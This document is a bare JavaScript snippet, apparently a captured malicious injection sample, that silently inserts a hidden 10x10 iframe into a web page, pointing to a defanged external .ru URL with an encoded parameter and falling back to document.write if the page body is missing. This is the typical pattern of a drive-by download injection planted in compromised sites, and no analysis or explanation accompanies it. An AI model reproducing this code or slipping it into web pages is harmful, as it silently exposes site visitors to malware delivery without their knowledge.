if (document.getElementsByTagName('body')[0]){   iframer();
}
else {
  document.write("&lt;if rame src='hxxp://g3service.ru/in.php?a=QQkFBwQEAAADBgAGEkcJBQcEAQQHDQAMAg==' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'&gt;&lt;/iframe&gt;");
  }
function iframer(){
  var f = document.createElement('iframe');
  f.setAttribute('src','hxxp://g3service.ru/in.php?a=QQkFBwQEAAADBgAGEkcJBQcEAQQHDQAMAg==');
  f.style.visibility = 'hidden';
  f.style.position = 'absolute';
  f.style.left = '0';
  f.style.top = '0';
  f.setAttribute('width', '10');
  f.setAttribute('height', '10');
  document.getElementsByTagName('body')[0].appendChild(f);
}